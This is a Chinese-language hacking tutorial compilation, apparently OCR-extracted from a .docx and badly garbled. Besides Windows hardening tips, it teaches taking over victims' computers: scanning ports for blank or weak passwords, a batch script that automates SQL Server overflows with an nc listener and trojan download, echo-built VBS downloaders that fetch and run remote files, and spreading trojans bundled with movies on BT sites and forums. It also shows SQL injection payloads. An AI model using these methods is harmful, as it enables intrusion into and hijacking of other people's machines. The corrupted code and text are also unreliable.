从零开始学习黑客技术入门教程(基础).docx
最简洁的黑客入门教程目录1黑客简介32爱护自己电脑确定不做黑客肉鸡53抓肉鸡的几种方法104防止黑客通过Exp1.orer侵入系统185SQ1.注入详解215.1 注入工具225.2 php+Mysq1.注入的误区235.3 简洁的例子265.4 语句构造295.5 高级应用465.6 实例545.7 注入的防范595.8 我看暴库漏洞原理与规律1615.9 我看暴库漏洞原理与规律2666跨站脚本攻击716.1 蹈站脚本工具716.2 什么是XSS攻击726.3 如何找寻XSS漏洞736.4 找寻跨站漏洞736.5 如何利用746.6 XSS与其它技术的结合777XPath注入787.1 XPath注入介绍787.2 XPath注入工具83声明:文章来源大多是网上收集而来,版权归其原作者全部。1黑客简介“黑客"(hacker)这个词通常被用来指那些恶意的乎安破坏者。关于“黑客”一词的经典定义,最初来源于麻省理工学院关于信息技术的一份文档,之后便被新闻工作者们长期运用。但是这个在麻省理工被当做中性词汇的术语,却渐渐被新闻工作者们用在了贬义的环境,而很多人也受其影响,最终导致了“黑客”一词总是用于贬义环境。有些人认为,我们应当接受”黑客”一词已经被用滥并旦有了新的意义,他们认为,假如不认可这种被滥用的词汇,那么将无法与那些不懂技术的人进行方效的沟通。而我仍旧认为,将黑客和恶意的骇客(CraCker)分开表述,对沟通会更有效,比如运用”恶意的平安骇客'会更简洁让对方理解我所指的对象,从而能够达到更好的沟通沟通效果,也避开了对“黑客”词的滥用。之所以要区分黑客和恶意骇客,是因为在某些状况下,我们探讨的对象是那些交无恶意并且不会对平安防卫或者用户隙私造成损'害的对象,这些人只有用“黑客"这个词来描述才最贴切。假如你只是简洁的将”黑客"和"恶意的平安骇客“划等号,将无法在与人沟通平安技术问题时,轻松的辨别别人所指的究竟是哪种类型的人。黑客和骇客的区分是,黑客仅仅对技术感爱好,而后者则是通过技术获得职业发展或者谋生。很多黑客和骇客都具有技术天赋,有些骇客据此进行职业发展。当然,并不是每个才技术天赋的人都必需沿着黑客或者骇客的方向发展。黑客这个术语的经典意义是指那些对于事物如何工作特别感爱好的人,他们修理,制作或者修改事物,并以此为乐。对于某些人来说,这个词并不精确,而对于另一些人来说,黑客意味着最终能完全驾驭某些事情.依据RFC1392的记载,互联网用户词汇将嘿客"定义为:痴迷于获得某些系统尤其是计算机和计算机网络系统内部运作机制的人。而这个词常常被错误的用于贬义环境。在贬义环境中,IE确的用词应当是“骇客"。TheJargOnWiki对于“黑客”的首次定义为:痴迷于探知可编程系统细微环节以与如何扩展其功能的人,与大多数只需了解系统基本学问的人不同。而平安骇客,则是以破坏平安系统为目的的人。有些平安骇客最终会用自己所驾驭的技术做善事,供应渗透测试服务,或者其他有利于平安防护的工作。而更多的人则是利用自己的技术行恶并。在RFC1.392和JargonWiki中都对“骇客”进行了类似的贬义定义。在不同的环境中运用正确的术语,对于泡通来说是特别重要的,在这方面我是有过切。体验的。一次与一家企业的负责人沟通时,我们运用相同的词汇,但是所指的对象却正好相反,结果沟通效果特别失败。当两种不同的背景卜.须要同一个词汇时,比如须要谈到传统意义的黑客以与带有恶意口的的骇客时,假如不事先将术语说明清晰,或给出确定的规范,确定会导致沟通困难。对于目前的沟通来说,一个更简洁的方法就是只适用恶意平安骇客,而不是黑客,这是因为:目前大部分消息中所指的,都是带有恶意目的的骇客,而不是以技术为目标的黑客。这就是为什么在我的文章中,总是会运用”恶意的平安骇客”来代指从事恶意活动的人,而在某些文章中假如须要涉与到传统意义的”黑客",我也会在文中再次进行说明。在探讨平安话题时,为了能更清晰的沟通,我也建议大家和我一样采纳正确的词汇。2爱护自己电*确定不做黑客内患第一招:屏幕爱护在Windows中启用了屏幕及护之后,只要我们国开计算机(或者不操作计算机)的时间达到fi设的时间,系统就会自动启动屏幕爱护程序,而当用户移动鼠标或敲击键盘想返P1.正常工作状态时,系统就会打开一个密码确认框,只有输入正确的密码之后才能返回系统,不知道密码的用户将无法进入工作状态,从而爱护数据的平安。提示:部分设计不完善的屏幕爱护程序没有屏蔽系统的"CtrI+A1.t+De的组合键,因此须要设置完成之后测试一下程序是否存在这个重大Bug.不过,屏幕爱护最快只能在用户府开1分钟之后自动启动,莫非我们必需坐在计算机旁等待N分钟看到屏幕爱护激活之后才能再离开吗?其实我们只要打开Windows安装书目里面的system子书目,然后找到相应的屏幕爱护程序(扩展名是SCR),按住鼠标右键将它们拖呗到桌面上,选择弹出菜单中的”在当前位置创建快捷方式”吩咐,在桌面上为这些屏幕爱护程序建立个快捷方式。此后,我们在高开计答机时双击这个快捷方式即可快速启动屏幕爱护。其次招:奇妙隐藏硬盘在"按Web页”杳看方式下,进入Windows书目时都会弹出一句警告信息,告知你这是系统文件夹假如”修改该文件夹的内容可能导致程序运行不正常,耍杳看该文件夹的内容,清单击显示文件",这时单击“显示文件”就可以进入该书目了。缘由是在Windows根书目下有desktop.ini和fo1.der.htt两个文件作祟。将这两个文件拷贝到某个驱动器的根书目下(由于这两个文件是隐藏文件,之前必需在文件夹选项中单击“查看"标签,选择”显示全部文件“,这样就可以望见这两个文件了)。再按"F5“健刷新一下,看看发生了什么,是不是和进入Windows书目时一样。接下来我们Hr记事本”打开fo1.derhtt,这是用HTM1.语言编写的一个文件,发挥你的想像力尽情地修改吧,假如你不懂HTM1.语言也没关系,先找到”显示文件”将其删除,找到”修改该文件夹的内可能导致程序运行不正常,要查看该文件夹的内容,请单击显示文件",将其改为自己喜爱的文字,例如"平安重地,闲杂人等请速离开工将”要查看该文件夹的内容,请单击“改为”否则,后果自负,接着向下拖动滑块到倒数第9行,找至J"(wvk>ggiT这是显示吸告信息时窗口右卜.角齿轮图片的路径,将其改为自己图片的路径,例如用T:tupiantupian1.jpg“替换“”后面的内容,记住这里必需将图片的后缀名打出,否则将显示不出图片。当然,你还可以用像DrCamWeaVer、FrOntPage这样的网页JI具做出更好的效果,然后只要将原文件拷贝到卜一面这段文字的后面,覆盖掉原文件中"”之间的内容就可以了。*This*usingthedcr.htt.保存并退出,按“F5”键刷新一下,是不是很有特性?接卜来要作的就是用“超级兔子"将你所要的驱动器隐藏起来,不用重新启动就可以观赏自己的作品了。最终告知大家一招更绝的,就是干脆将fo1.der.htt原文件中"”之间的内容全部删除,这样就会给打开你的驱动器的人造成一种这是一个空驳动器的假象,使其中的文件更平安。第三招:禁用“起先”菜单吩咐在WindoWS2000/XP中都集成了组策略的功能,通过组策略可以设置各种软件、计算机和用户策略在某种方面增加系统的平安性.运行"起先-*运行"吩咐,在“运行"对话框的“打开"栏中输入"gpeditmsc”,然后单击“确定按钮即可启动WindOwSXP组策略编辑器。在”本地计算机策Ur中,逐级绽开"用户配置管理模板一任务栏和起先菜单”分支,在右恻窗口中供应了“任务栏”和“起先菜单”的有关策蛤。在禁用“起先”菜单吩咐的时候,在右侧窗口中,供应了删除"起先“菜单中的公用程序组、”我的文档"图标、”文档“菜单、“网上邻居”图标等策略.清理起先”菜单的时候只要将不须要的菜单项所对应的策略启用即可,比如以删除“我的文档”图标为例,具体操作步骤为:1)在策略列表窗口中用鼠标双击”从起先菜单中删除我的文档图标”选项。2)在弹出窗口的”设置“标签中,选择“已启用“单选按钮,然后单击“确定”即可。第四招:案面相关选项的禁用WindoWSXP的桌面就像你的办公桌一样,有时须要进行整理和清洁。力了组策略编辑器之后,这项工作将变得易如反掌,只要在”本地计算机策略“中绽开”用户配置T管理模板-桌面”分支,即可在右侧窗11中显示相应的策略选项。1)隐藏案面的系统图标倘如隐藏桌面上的系统图标,传统的方法是通过采纳修改注册表的方式来实现,这势必造成确定的风险性,采纳组策略编辑器,即可便利快捷地达到此目的。若要隐藏桌面上的”网上邻居"和"IntemetEXP1.orer”图标,只要在右侧窗口中将.隐藏桌面上网上邻居图标"和”隐藏桌面上的InternetEXP1.Ore1."图标”两个策略选项启用即可。假如隐藏桌面上的全部图标,只要将"隐藏和禁用桌面上的全部项目"启用即可。当启用了"删除桌面上的我的文档图标"和”删除桌面上的我的电脑图标”两个选项以后,"我的电脑和'我的文档"图标将从你的电脑桌面上消逝了。假如在桌面上你不再喜爱"回收站'这个图标,那么也可以把它给删除,具体方法是将”从桌面删除回收站”策略项启用。2)禁止对桌面的某些更改假如你不希望别人随意变更计算机案面的设置,请在右侧窗口中将"退出时不保存设置.'这个策略选项启用。当你启用这个了设置以后,具:他用户可以对桌面做某些更改,但有些更改,诸如图标和打开窗口的位置、任务栏的位置与大小在用户注销后都无法保存。第五招:禁止访问”限制面板“假如你不希望其他用户访问计算机的限制面板,你只要运行组策略编辑器,并在左侧窗口中绽开"本地计算机策略用户配置-管理模板-限制面板”分支,然后将右侧窗11的”禁止访问限制面板”策略启用即可。此项设置可以防止限制面板程序文件的启动,其结果是他人将无法启动限制面板或运行任何限制面板项目。另外,这个设置将从“起先“菜单中删除限制面板,同时这个设置还从Windows资源管理器中删除限制面板文件夹。提示:假如你想从上下文菜单的属性项目中选择一个限制面板”项目,会出现一个消息,说明该设置防止这个操作。第六招:设置用户权限当多人共用一台计算机时,在WindoWSXP中设置用户权限,可以依据以下步骤进行:1)运行组策略编辑器程序。2)在编辑器窗口的左侧窗口中逐级绽开”计算机配置Windows设置-*平安设置-本地策略用户权限指派”分支。3)双击须要变更的用户权限,单击”添加用户或组.按钮,然后双击想指派给权限的用户账号,最终单击“确定"按钮退出。第七招:文件夹设置审核WindowsXP可以运用审核跟踪用于访问文件或其他对象的用户账户、登录尝试、系统关闭或重新启动以与类似的事务,而审核文件和NTFS分区下的文件夹可以保证文件和文件夹的平安。为文件和文件夹设置审核的步骤如MI)在组策略窗口中,逐级绽开右侧窗口中的”计算机配置-Windows设置T平安设置f本地策略”分支,然后在该分支下选择”审核策略"选项。2)在右侧窗口中用鼠标双击"审核对象访问”选项。3)用鼠标右键单击想要审核的文件或文件夹,选择弹出菜单的属性”吩咐,接着在弹出的窗口中选择“平安"标签C4)单击“高级”按钮,然后选择“审核”标签。5)依据具体状况选择你的操作:倘如对一个新组或用户设置审核,可以单击“添加"按钮,并且在"名称"框中键入新用户名,然后单击“确定"按钮打开"审核项目"对话框。要杳看或更改原方的组成用户审核,可以选择用户名,然后单击”查看/编辑”按钮。要删除原有的组成用户审核,可以选择用户名,然后单击“删除“按钮即可。6)如有必要的话,在"审核项口1对话机中的"应用至列表中选取你希望审核的地方。7)假如想禁止书目树中的文件和子文件夹继承这些审核项目,选择.仅对此容器内的对象和/或容器应用这些审核项”复选框。留意:必需是管理员组成员或在组策略中被授权有“管理审核和平安日志”权限的用户可以审核文件或文件夹。在WindowsXP审核文件、文件夹之前,你必命启用组策略中中核策略”的"审核对象访问”。否则,当你设置完文件、文件夹审核时会返回一个错误消息,并且文件、文件夹都没有被审核。3抓内需的几科方法找点工具就o了端口抓肉鸡的几种方法肉鸡大家都应当清晰是什么东西吧!呵呵这点就不用说r渐渐学1、3389抓鸡现在国内网络上流传着一种克降版的XP,安装后会默认开启一个账号为new,密码为空的账户,而且基本上都是开着3389的,我们就可以利用这一点来抓肉鸡.首先用端口扫描工具扫一段IP的3389端口,扫完后一就F脆用远程桌面连接开放3389的机器(也可以把结果保存为文本文件,用批量生成3389连接的工具来连接),然后输入账号new登入,假如别人的电脑前没人的话你就可以去你的空间下载你传好的木马安装拉一这种方法只针XP系统,假如遇到2000或者2003系统就不要试r呵呵。缺点也很明显,假如别人不是用new账号登入XP的,你再登入上去就会把他挤出去(XP只支持单用户登入,用户登入须要用工具开),或者电脑前有人你就不行能去打开IE下载木马了。2、扫135端口抓肉鸡忏先先用端口扫描器扫段IP的135端口,然后把结果保存,再用NTSCAN过滤有弱口令的机器,最终用recton开传马。因为现在】35和445端口都被防火墙屏蔽了,只能扫本地的135肉鸡,要抓外地的只能用外地的135肉鸡来扫。(具体动画可以去黑客网站搜寻135)3、扫445端口抓肉鸡和扫135抓肉鸡差不多,首先先用端口扫描器扫一段IP的445端口,然后把结果保存,再用NTSCAN过滤有弱口令的机器,最终用啊D工具包开共享传马。因为现在135和445端口都被防火墙屏蔽了,只能扫本地的445肉鸡,要抓外地的只能用外地的445肉鸡来扫C(具体动画可以去黑客网站搜寻445)4、1433端口批及溢出抓肉鸡这个方法可以实现全自动抓鸡,不过现在太多人搞,胜利率已经不高了。要用到的工具:S扫sq1.he1.1.o.exenc.exe批处理文件首先先写个批处理,打开记事本,把以下代码复制修改后,储存为扫描+溢出bat文件echoofffor/f'co1.=;tokcns=1,2de1.ims="%iin(tt.txt)dos.exetcp%i%j14331000/savecchooffforf"eo1.=jtokens=1.de1.ims="%iin(Resu1.t.txt)dosq1.he1.1.o%i还要新建个tt.txt,里面你要扫的IP段,格式为XXX.XXX.XXX.XXXXXX.XXX.XXX.XXX,中间是空格1433是要扫描的端口,1000是扫描线程数,dosq1.he1.1.o%i1433xxx.xxx.xxxx556这个里的XXX添你的IP,556是后面NC监听的端口然后再写个批处理echooffNc-1.-w-p556>daima.txtechousername>>daima.txtechopassword>>daima.txtechobin>>daima.txt(以2进制传输数据)CChOgCtXxX.cxc(你的木马的文件名,要放在根书目下)>>daima.txtechobye>>daima.txtnetstopsharedacccss(关闭WINDOWS自带防火墙)xxxexe(也是填你木马的文件名)de1.daima.txt留意上面的代码PI车符别删掉,要不然就没法下你的马fo几种肉鸡上传文件的方法tftp法先在自己某机器上建个tftp服务器,如执行t,再将文件(SamP1.eexe)上传到别的机器中(肉鸡),肉鸡cmd中执行:tftp-i服务器ipgetsamp1.e.exeftp法肉鸡Cmd中执行:echoopenftp服务器ipi11>echousemame>>echopassword>>echogetsamp1.e.exe>>echobye>>de1.工具法利用wineggdrop的wget.exe肉鸡Cmd中执行:Wget网站/samp1.e.exe利用d1.vbe法肉鸡Cmd中执行:echowithwscript:if.arguments.countA<2then.quit:endif>d1.vbeechosetaso=.createobject("adodb.stream"):setWeb=CreateObjeCtrmiCrOsoft.Xm1.")>>d1.vbeechoweb.open"get",.arguments(O),O:web.send:ifweb.status>200thenquit>>d1.vbeechoaso.type=1.:aso.open:aso.writeweb.rcsponsebody:aso.Savetofi1.e.arguments(1),2:endwith>d1.vbe利用iget.vbe法方法同4,肉鸡Cmd中执行:echoi1.oca1.=1.Case(WScript.Arguments(1.)>iget.vbeechoiRemote=1.Case(WScript.Arguments(0)>>iget.vbeechoSetxPost=CreateObject("Microsoft.XM1.")>>iget.vbeechoxPost.Open1GET",iRemote,0>>iget.vbeechoxPost.Send()>>iget.vbeechoSetsGet=CreateObject("ADODB.Stream")>>iget.vbeechosGct.Modc=3>>iget.vbeechosGet.Type=1>>iget.vbeechosGet.Open()>>iget.vbeechosGet.Write(xPost.responseBody)>>iget.vbeechosGet.SaveTo>>iget.vbe利用网站Vbe法echoSetxPost=CreateObject("Microsoft.XM1.")>dsa.vbeechoxPost.Open"GET",":*.*.*.*/SamP1.e.exe",0>>dsa.vbeechoxPost.Send()>>dsa.vbeechoSetsGet=CreateObject("DODB.Stream")>>dsa.vbeechosGet.Mode=3>>dsa.vbeechosGet.Type=1>>dsa.vbeechosGet.Open()>>dsa.vbeechosGet.Write(xPost.responseBody)>>dsa.vbeechosGet.SaveTo",2>>dsa.vbecscriptdsa.vbede1.dsa.vbe3389法可以开3389,然后登陆,进行本地的下战。该方法对服务器上传很严格的机器特有效°(包括硬件防火墙)先打开多个NCbat然后再打开扫描+溢出bat然后你就可以去睡大觉了。自动扫描,扫描完后自动溢出,溢出后还自动马执行,爽吧!所以这里讲具体点,呵呵。还有4221端11也可以这样溢出,只要用这些端口的溢出工具就好了,具体动画可以去黑客网站搜寻1433。忘了说,上面的工具和批处理什么的都要放在同一个文件夹下。先休息一下,打这么多字累死了接着5、扫1433抓肉鸡之方法2要用到的工具:端11扫描器X-SCanSQ1.综合利用工具上面我们说过了,1433溢出现在胜利率已经不高了,所以我们可以用另一种方法。开了1433端11的机器一般都装了SQ1.,所以我们可以揣测SQ1.弱口令来抓1433肉鸡。首先先用端口打描器打一段IP的1433端口,然后结果保存为文本文件,接着用X-SCan导入这些开了1433的IP,然后在扫描参数-全时设置-扫描模块这一栏里只勾ESQ1.SERVER就可以了,其他不要勾。然后在插件设置一端口相关设置-待检测端口这一栏,只填1433端口。然后就可以起先扫描了。打描完成后会有个报告,列出了有弱口令的机器,然后打开SQ1.综合利用工具,输入你扫到的期口令来连接,接着打开SQ1.综合利用工具-利用书目,上传你的木马,然后在用DoS吩咐执行你的木马就OK了。6、用W1.NNTAUtoAttaCk扫SA弱口令抓肉鸡其实这个原理和上面一样,效率也没上面的高,只是想让大家知道F,呵呵。工具:W1.NNTAUtOAttaCkSQ1.综合利用工具打开WINNTAUtoAttack,找一段IP添上,然后只勾上设置产的仅对PING检杳胜利的机器进行检测和SQ1.列出密码为空的SA账号,接着起先扫描,扫完后,用SQ1.综合利用工具连上传马执行就好了。7、扫4899空口令抓肉鸡工具:端口扫描器4899探测器Radmin首先先用端口扫描器扫一段IP的4899谕口,然后用4899探测器导入开了4899端口的IP,接着扫空令,最终用Radmin连接方空口令的机器,带开文件管理,上传的你木马运行就OK了。具体动画可以去黑客网站搜寻48998、扫5900端口抓VNC肉鸡工具:VNC扫描器VNC连接揶首先用VNC扫描器扫描一段IP,扫描格式为VSCanexe(扫描器文件名)-i219.0.0.0-219.255.255.255(扫描IP段)-p5900-VnC-VV扫描完成后会在扫描器所在的同一文件夹生成一个文本文件,打开后有一列IP,IP后面的有一些单词比如PatChed,banned,vu1.nerab1.e,只有单词为vu1.nerab1.e才能连接。接着就用VNC连接器连接,下面就不用多说了吧?具体动画可以去黑客网站搜寻VNC接下来说说挂马抓肉鸡吧。方法有很多,比如BT挂马、免费空间挂马、迅雷挂马等等,有些我也还不会,呵呵。卜.面就介绍几种我会的C1、BT挂马顾名思义,就是把你的木马发布到BT网站让人下载。当然假如只把单纯的木马文件发布上去效果确定不好,而且现在一般的BT网站也不让发布EXE文件。所以我们须要一些隐藏的手法。我们可以先把木马用捆绑器和一些电影、音乐、嬉戏捆绑在一起,再压缩成RAR文件发布,i隹在起先下栽时会知道RAR里方木马呢?当他费了好大劲下载完,打开发觉是EXE的格式后,总有些菜鸟会不想辜负自己花费的时间而忍不住打开吧?尤其是下XXX片的时候当然你也可以做个网页木马,然后把你网页木马的地址插入到你发布的文件中(不是全部文件都可以这样的,我只知道RM和EXE文件可以插入),别人下毂打开后同时也会带开你的网页木马,假如他的系统没有补供你网页木马所利用的漏洞的话,那他就会中你的马了。有些挚友可能会想,我把木马和共他文件捆绑后格式保持为那个文件(比如RM捆绑木马后保持RM格式),那样别人不就不会怀疑了吗?呵呵,假如真有这样的好事那我上面何不说把木马和BT种f文件绑在一起发布,那样你肉鸡不抓疯了才怪所以在这里说一3木马和其他文件拥绑后生成的文件只能为EXE格式的,除非你有你所捆绑文件的格式的溢出漏洞,那样才能把生成后的文件格式保持为你所狒绑文件的格式,不过这样的漏洞现在很少,大多都被补了,就算有别人也不确定会公开,为什么想想就知道了吧。在这里就说一个最近的RAR溢出漏洞,针对Winrar3.6版本以下的全部版本,只要你Winrar版本低于3.6,运行绑了牧马的RAR文件后就会中马。此类木马症状为:运行RAR文件后会弹出一个什么什么损坏还是错误的对话框,然后RAR文件体积变小,削减的体积就为木马的体积。然后再次打开这个RAR文件一切正常,不会弹出错误对话框。在这里提示下各位赶快更新下W1.NRAR版本,当心中马哈。2、免费空间挂马其实和BT差不多,就是把做好的木立刻传到你申请的免费空间,然后到论坛发些诱惑性的帖广让别人下栽你的木马,优点是不用像BT那样做种子,那样不仅要开着电脑,还影响网速。我这几天就是这样挂的,弄个免费空间,上传个木马,到2个XXX论坛发个帖子,每天睡前一顶。上面有好多可以学的,不清晰的问卜我4防止黑客道过切Iorer侵入系端给点票票撒好不简洁探讨出来的哦确定好用恶意黑客和病毒编译者能利用你邮件和网页阅读软件中的担优全设置来侵入你的电脑。他们可以通过给你发电子邮件或者诱惑你阅读含方恶意代码的网页来达到他们的目的.通过提高你的微软IE阅读器,Out1.t1.ook和Out1.ookExpress的平安设置,可以来帮助你减小被攻击的可能。恶意黑客和病毒编译者能利用你邮件和网页阅读软件中的担忧全设置来侵入你的电脑.他们可以通过给你发电子邮件或者诱惑你阅读含有恶意代码的网页来达到他们的目的。通过提高你的微软IE阅读器,OUt1.t1.ook和OUt100kEXPrCSS的平安设置,可以来帮助你减小被攻击的可能。步骤一:设置你阅读器平安级别为高在你运用IE阅读器来阅读网页的时候来提升平安等级:1 .在IE的工具菜单中点击Internet选项。2 .在IntCrnetOPtiOnS的对话框中,点击平安标签,并选择InternCt图标。3 .在该区域的平安级别选项中,滑动滑条至最高点。这样设置你阅读的全部网站的平安级别为最高。(假如没有滑动条,点击默认级别然后再滑动滑条至最高点。)留意:高的设置可能导致一些网站不行以正常阅读。假如你在变更这个设置后难以正常阅读网页,你可以将你要阅读的网页加到受信任站点列表当中。这将允许网页可以在高平安设置的状况卜.正常阅读。步骤二:加平安网站到受信任站点列表设置IE平安级别到高可能导致一些网站步可以正常访问,这其中包括了MicrosoftwindowsPUpdateo假如你在变更了设置后不能正常访问M站,你可以把他们加到受信任站点的列表当中,这将令网站可正常工作。微软建议先将WindOWSUPdate)加入受信任站点列表,从而你能干脆安装总要的系统升级。加平安网站到受信任站点列表:1 .在IE工具菜单,点击Internet选项。2 .在IntCmet选项的对话框中,点击平安标签。3 .点击受信任站点的图标,并点击网站按钮,4 .在受信任站点对话框中,输入网站的UR1.在"将该网站添加到区域中”的对话框里,并且点击添加。受信任站点的特点是只能用以:开头的UR1.0取消对该区域中的全部站点要求服务器验证的选项。5 .点击确定。6 .在该区域的平安级别中,移动滑条至中级。这样就设定全部你信任的站点的平安级别为中级。(假如没有滑动条,点击默认级别然后再滑动滑条至最高点。)步骤三:以明文阅读电子邮件信息为了帮助提高你的电子邮件的平安性,设置Out1.ook或者Out1.ookExpress为明文阅读全部信息。在Out1.ookExpress设置明文阅读信息:1 .在Out1.ookExpress工具菜单中,点击选项。2 .在选项对话框中,点击阅读标签。3 .选择明文阅读全部信息。4 .点击确定。在Out1.ook设置明文阅读信息:1 .在Out1.ookExpress工具菜单中,点击选项。2 .在选项对话框中首选参数的标签卜,点击电子邮件选项按钮。3 .在E-mai1.选项对话植中,选择阅读以文本格式阅读全部标准邮件.4 .点击确定来关闭E-mai1.选项对话框,再点击确定关闭选项对话框。步豚四:在你的阅读器中阻挡弹出窗口为了强护你的电脑不受恶意弹出窗口的影响,而实行确定的措施来阻挡他们打开。一些网站运用小的阅读舒口来显示广告,有时会是一些烦人的内容。恶意的攻击者也可能利用弹出窗口伪装成广告或者建议来在你的电脑上安装恶意代码。有效的方法是你在你的阅读器中安装一个防止弹出窗口的工具。大部分类似的软件与IE都是兼容的,其中就包括免费的MSN工具栏。5 SQ1.注入详解2003年起先,喜爱脚本攻击的人越来越多,而且探讨ASP卜.注入的挈友也渐渐多了起来,我看过最早的关于SQ1.注入的文章是一篇99年国外的高手写的,而现在国外的已经炉火纯背了,国内才起先留意这个技术,由此看来,国内的这方面的技术相对于国外还是有一段很大差距,话说回来,大家对SQ1.注入攻击也相当熟识了,国内各大站点都有些堪称经典的作品,不过作为一篇完整的文章,我觉得还是有必要再说说其定义和原理。假如哪位高手已经达到炉火纯青的地步,不妨给本文挑点刺。权当指引小弟。国内能看到php+Mysq1.注入的文点可能比较少,但是假如关注各种WEB程序的漏洞,就可以发觉,其实这些漏洞的文章其实就是一个例子。不过由于国内探讨PHP的人比探讨ASP的人实在少太多,所以,可能没有留意,况且PHP的平安性比ASP高很多,导致很多人不想跨越这个门槛,尽管如此,在PHP站点口益增多的今口,SQ1.注入仍是最有效地麻烦的一种攻击方式,有效是因为至少70%以上的站点存在SQ1.InjeCtiOn漏洞,包括国内大部分平安站点,麻烦是因为MYSQ1.4以卜的版本是不支持子语句的,而且当php.ini里的magic_quotcs_gpc为On时。提交的变眼中全部的(单引号),“(双引号),(反斜线)and空字符会自动转为含有反斜线的转义字符。给注入带来不少的阻碍。5.1 注入工具关于SQ1.注入,目前已经有工具软件支持,如WebCruiser-WebVu1.nerabi1.ityScanner(Web平安漏洞扫描工具,可以扫描出网站存在SQ1.注入、跨站脚本攻击、XPath注入的页面,并且可以进一步进行SQ1.注入验证、跨站攻击验证、XPath注入验证,官方网站为):假如您想深化学习手工注入,请接着往下看:早期的时候,依据程序的代码,要构造出没有引号的语句形成有效的攻击,还真的有点困难,好在现在的技术已经构造出不带引号的语句应用在某些场合。只要有阅历,其实构造方效的语句一点也不难,甚至胜利率也很高,但具体状况具体分析。首先要走出一个误区。注:在没有1具体说明的状况下,我们假设magic_quotcs_gpc均为oH。5.2 php+Mysq1.注入的课区很多人认为在PHP+MYSQ1.下注入确定要用到单引号,或者是没方方法像MSSQ1.那样可以运用"dec1.areasysnamese1.ecta=<command>cxecmaster.dbo.xp_cmdshe1.1.a"这类的吩咐来消退引号,其实这个是大家对注入的一种误会或这说是对注入相识上的一种误区。为什么呢?因为不管在什么语言里,在引号(包括单双)里,全部字符串均是常量,即使是dir这样的吩咐,也紧紧是字符串而已,并不能当做吩咐执行,除非是这样写的代码:Scommand="dirc:"SyStem($COmmand);否则仅仅只是字符串,当然,我们所说的吩咐不单指系统吩咐,我们这里说的是SQ1.语句,要让我们构造的SQ1.语句正常执行,就不能让我们的语句变成字符串,那么什么状况卜.会用单引号?什么时候不用呢?看看下面两句SQ1.语句:SE1.ECT*FROMartic1.eWHEREartic1.eid='Sid,SE1.ECT"FROMartic1.cWHEREartiCIeid=$id两种写法在各种程序中都很普遍,但平安性是不同的,第一句由于把变出Sid放在一对单引号中,这样使得我们所提交的变量都变成了字符串,即使包含了正确的SQ1.语句,也不会正常执行,而其次句不同,由于没有把变量放进单引号中,那我们所提交的一切,只要包含空格,那空格后的变我都会作为SQ1.语句执行,我们针对两个句子分别提交两个胜利注入的畸形语句,来看看不同之处。指定变&$id为:and1=2unionse1.ect*fromuserwhereuserid三1/*此时整个SQ1.语句变为:SE1.EcrfFROMartic1.eWHEREartic1.eid='1'and1=2unionse1.ect4fromuscrwhcreuserid=1./*'指定变地$id为:1and1.=2unionse1.ect*fromuserwhereuserid=1此时整个SQ1.语句变为:SE1.ECT*FROMartic1.eWHEREartic1.eid=1and1=2unionse1.ect*fromuserwhereuserid=1看出来了吗?由于第一句有单引号,我们必需先闭合前面的单引号,这样才能使后面的语句作为SQ1.执行,并要注释掉后面原SQ1.语句中的后面的单引号,这样才可以胜利注入,假如php.ini中magic_quotes_gpc设置为on或者变盘前运用了adds1.ashes()函数,我们的攻击就会化为乌行,但其次句没有用引号包含变量,那我们也不用考虑去闭合、注释,干脆提交就OK了。大家看到一些文章给出的语句中没有包含单引号例如pinkeyes的php注入实例中给出的那句SQ1.语句,是没有包含引号的,大家不要认为真的可以不用引号注入,细致看看PHPBB的代码,就可以发觉,那个Sforum-id所在的SQ1.语句是这样写的:Ssq1.=pSE1.ECT*FROM,.FORUMS-TAB1.E."WHEREforumJd=$forum_id"由于没有用单引号包含变里,才给PinkeyeS这个家伙有机可乘,所以大家在写PHP程序的时候,记得用单引号把变量包含起来。当然,必要的平安措施是必不行少的。5.3简洁的例子先举一个例子来给大家了解一卜PHP卜的注入的特殊性和原理。当然,这个例F也可以告知大家如何学习构造有效的SQ1.语句。我们拿一个用户验证的例子,首先建立一个数据库和一个数据表并插入一条记录,如F:Createtab1.e'user('userid'int(1.1.)NOTNU1.1.autoJncrement,'uscmamc'varchar(20)NOTNU1.1.defau1.t",'password'varchar(20)NOTNU1.1.defau1.t",PR1.MARYKEYfuserid)TYPE=MyISAMAUT0JNCREMENT=3;#导出表中的数据'user'#INSERTINTOuserVA1.UES(1,'ange,mypass,);验证用户文件的代码如下:<?php$SerVername="1.oca1.host”;$dbusername="root"Sdbpassword=""Sdbname="injection,'mysq1._connect($servername,Sdbusername,Sdbpassword)ordie("数据库连接失败");$sq1.e"SE1.ECT*FROMuserWHEREusername='$usernameANDpaSSWOrd='$PaSSWord”'$resu1.t=mySq1.db_query($dbname,$sq1.)